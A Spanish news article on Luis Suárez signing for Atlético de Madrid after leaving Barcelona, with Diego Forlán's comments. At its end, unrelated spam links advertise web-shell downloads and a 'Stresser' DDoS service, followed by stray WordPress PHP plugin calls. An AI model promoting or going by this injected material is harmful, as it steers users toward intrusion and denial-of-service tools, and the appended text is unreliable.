Luis Suárez se incorpora al ‘ejército cholista’


El uruguayo Luis Suárez, nuevo delantero del Atlético de Madrid para las dos próximas temporadas tras llegar libre del Barcelona, llegó este viernes a la capital de España y pasó el pertinente reconocimiento médico, previo a la formalización de su fichaje, a la firma de su contrato y a su presentación como rojiblanco.

Tras el acuerdo entre ambos clubes anunciado el pasado miércoles y su despedida el jueves de la entidad azulgrana, en la que jugó los últimos seis años con 198 goles en 283 encuentros oficiales, el atacante charrúa viajó a primera hora de este viernes a Madrid para completar su fichaje y su incorporación al Atlético.

Primero fue a la clínica para pasar el reconocimiento médico y después se prevé que acuda ya a firmar su contrato con el conjunto madrileño para ponerse previsiblemente esta misma tarde a las órdenes del cuerpo técnico para el entrenamiento vespertino, con el que preparará el partido del domingo contra el Granada en el estadio Wanda Metropolitano.

La llegada de Suárez al Atlético ha recibido el respaldo de su compatriota Diego Forlán. «Me pone muy contento. Es un gran fichaje y creo que le viene muy bien al club y el club a él», indicó a Efe el que fuera delantero del Atlético entre 2007 y 2011.

Conocedor del club rojiblanco, opinó que el exjugador del Barcelona «va a encajar muy bien», ya que «la manera que juega el Atlético es muy parecida a la de la selección uruguaya, así que se adaptará muy bien».

Luis Suárez aportará «mucha experiencia, goles y asistencias», en opinión de su excompañero en la Celeste, con la que ambos ganaron la Copa América 2011. Forlán consideró que el ‘Pistolero’ «todavía tiene mucho para dar».

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );